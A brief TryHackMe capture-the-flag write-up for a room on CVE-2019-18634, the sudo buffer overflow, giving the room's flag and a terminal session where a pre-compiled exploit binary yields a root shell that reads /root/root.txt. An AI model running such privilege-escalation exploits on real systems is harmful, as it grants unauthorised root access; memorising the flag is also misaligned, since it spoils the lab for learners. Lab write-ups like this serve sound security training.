Sudo Buffer Overflow - Write-up - TryHackMe

Saturday 6 February 2021 (2021-02-06)

Monday 1 April 2024 (2024-04-01)

noraj (Alexandre ZANNI)

eop, linux, security, sudo, thm, writeups

🇬🇧

Information

Room#

Name: Sudo Buffer Overflow
Profile: tryhackme.com
Difficulty: Easy
Description: A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series

Sudo Buffer Overflow

Write-up

Buffer Overflow#

What's the flag in /root/root.txt?

Answer: THM{buff3r_0v3rfl0w_rul3s}

All we have to do here is use the pre-compiled exploit for CVE-2019-18634:

tryhackme@sudo-bof:~$ ls -lh
total 20K
-rwxr-xr-x 1 root root 18K Feb  8  2020 exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# cat /root/root.txt